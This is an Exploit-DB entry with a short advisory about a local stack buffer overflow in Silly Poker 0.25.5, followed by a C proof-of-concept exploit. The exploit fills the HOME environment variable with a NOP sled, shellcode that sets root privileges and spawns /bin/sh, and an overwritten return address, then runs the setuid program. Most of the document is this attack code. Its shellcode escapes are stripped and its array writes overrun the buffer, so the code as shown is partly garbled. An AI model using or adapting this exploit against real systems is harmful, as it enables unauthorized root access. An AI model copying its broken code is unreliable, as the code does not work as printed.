https://www.exploit-db.com/exploits/23204

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8736/info

A local buffer overrun vulnerability has been reported for Silly Poker. The problem occurs due to insufficient bounds checking when handling user-supplied data. As a result, an attacker may be capable of controlling the execution flow of the sillypoker program and effectivley executing arbitrary code with elevated privileges. 

/* c-sillyPoker.c
 *
 * PoC exploit made for advisory based uppon an local stack based overflow.
 * Vulnerable versions, maybe also prior versions:
 *
 * silly Poker v0.25.5
 *
 * Tested on:  Debian 3.1
 *
 * Advisory source: c-code.net (security research team)
 * http://www.c-code.net/Releases/Advisories/c-code-adv002.txt
 *
 * ---------------------------------------------
 * coded by: demz (c-code.net) ([email protected])
 * ---------------------------------------------
 *
 */

#include <stdio.h>
#include <stdlib.h>

char shellcode[]=

	"x31xc0"                      // xor          eax, eax
        "x31xdb"                      // xor          ebx, ebx
        "x31xc9"                      // xor          ecx, ecx
        "xb0x46"                      // mov          al, 70
        "xcdx80"                      // int          0x80

        "x31xc0"                      // xor          eax, eax
        "x50"                          // push         eax
        "x68x6ex2fx73x68"          // push  long   0x68732f6e
        "x68x2fx2fx62x69"          // push  long   0x69622f2f
        "x89xe3"                      // mov          ebx, esp
        "x50"                          // push         eax
        "x53"                          // push         ebx
        "x89xe1"                      // mov          ecx, esp
        "x99"                          // cdq
        "xb0x0b"                      // mov          al, 11
        "xcdx80"                      // int          0x80

        "x31xc0"                      // xor          eax, eax
        "xb0x01"                      // mov          al, 1
        "xcdx80";                     // int          0x80

int main()
{
	unsigned long ret = 0xbffffb44;

	char buffer[1028];
	int i=0;

	memset(buffer, 0x90, sizeof(buffer));

	for (0; i < strlen(shellcode) - 1;i++)
	buffer[500 + i] = shellcode[i];

	buffer[1028] = (ret & 0x000000ff);
	buffer[1029] = (ret & 0x0000ff00) >> 8;
	buffer[1030] = (ret & 0x00ff0000) >> 16;
	buffer[1031] = (ret & 0xff000000) >> 24;
	buffer[1032] = 0x0;

	printf("nsilly Poker v0.25.5 local exploitn");
        printf("---------------------------------------- demz @ c-code.net --n");

	setenv("HOME", buffer, 1);

	execl("/usr/bin/sillypoker", "sillypoker", NULL);
}